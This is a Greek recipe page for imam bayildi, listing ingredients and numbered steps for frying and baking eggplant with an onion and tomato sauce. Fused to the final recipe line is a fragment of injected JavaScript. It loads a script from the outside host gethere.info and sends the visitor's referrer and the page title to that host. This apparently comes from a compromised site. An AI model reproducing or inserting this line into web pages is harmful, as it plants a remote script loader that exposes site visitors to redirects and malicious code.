mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Ιμάμ μπαϊλντί

Ιμάμ μπαϊλντί

better with fetter.jpgΟ Ιούνιος μπήκε και μαζί του έφερε το αγαπημένο μωβ λαχανικό στην κουζίνα μας! Ο λόγος για τη μελιτζάνα που το καλοκαίρι συνοδεύει πολλά πιάτα κι εμπνέει πολλές νοικοκυρές!
Ένα από τα πιο γνωστά παραδοσιακά φαγητά είναι το Ιμάμ μπαϊλντί που πήρε το όνομά του από έναν Ιμάμη που μπαΐλντισε δηλαδή λιποθύμησε όταν δοκίμασε για πρώτη φορά το συγκεκριμένο φαγητό!

Το πιάτο αυτό που κύριο ρόλο παίζουν οι μελιτζάνες το συναντάμε όχι μόνο στην Ελληνική κουζίνα αλλά και στην Τούρκικη, την Βουλγάρικη, και την Αλβανική!

Για την προετοιμασία του πιάτου αυτού οι μελιτζάνες τηγανίζονται και στην συνέχεια ψήνονται στο φούρνο παρέα με μυρωδικά και άλλες νοστιμιές!
Απαραίτητο γεύμα ή μεζές για την καλοκαιρινή περίοδο που ξεκινάει!

Υλικά:

7-8 μελιτζάνες
4  κρεμμύδια
3 σκελίδες σκόρδο
μαϊντανός
1 φλιτζ. σάλτσα από φρέσκια ντομάτα
λίγη ζάχαρη
1/2 φλιτζ. κρασί
1 κ.σ. κόκκινο πιπέρι
1 κ.σ. μαύρο πιπέρι
1 κ.γλ. μπαχάρι
2 φύλλα δάφνης
1 κ.σ. ρίγανη
Αλάτι
ελαιόλαδο

Εκτέλεση:

1. Πλένουμε καλά τις μελιτζάνες κι έπειτα τις σκουπίζουμε και τις κόβουμε τις μελιτζάνες σε φέτες
2. Σε ένα τηγάνι βάζουμε ελαιόλαδο και μόλις ζεσταθεί τηγανίζουμε για λίγο τις μελιτζάνες μέχρι να μαλακώσουν. Μόλις μαλακώσουν τις βγάζουμε και τις αφήνουμε σε ένα πιάτο.
3. Κόβουμε τα κρεμμύδια σε φέτες και τα τσιγαρίζουμε κι αυτά σε ελαιόλαδο μέχρι να μαλακώσουν αλλά χωρίς να τα τηγανίσουμε.
4. Λίγο πριν τα βγάλουμε προσθέτουμε το σκόρδο αφού το έχουμε ψιλοκόψει.
5. Μετά από 1 λεπρό σβήνουμε με το κρασί και αφήνουμε στη φωτιά για 2-3 λεπτά.
6. Έπειτα προσθέτουμε το αλάτι, το μαύρο και το κόκκινο πιπέρι, το χυμό ντομάτας και τη ζάχαρη.
7. Βάζουμε λίγο νεράκι και αφήνουμε να βράσει για λίγο η σάλτσα με τα κρεμμύδια
8. Λίγο πριν τα βγάλουμε ρίχνουμε τον ψιλοκομμένο μαϊντανό και τη ρίγανη
9. Σε ένα πυρίμαχο σκεύος βάζουμε τις μελιτζάνες στη σειρά.
10. Σε κάθε μελιτζάνα βάζουμε λίγη σάλτσα και πασπαλίζουμε με το μπαχάρι και τα φύλλα δάφνης
11. Έπειτα αδειάζουμε όλη τη σάλτσα από πάνω να πάει παντού και ψήνουμε σε μέτρια θερμοκρασία μέχρι να δέσει η σάλτα με τις μελιτζάνες!

Εάν θέλουμε  τρίβουμε  φέτα!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Share This
3 Σχόλια
  1. […] post Ιμάμ μπαϊλντί appeared first on Arkoudos, Συνταγές … […]

  2. […] Ιμάμ μπαϊλντί […]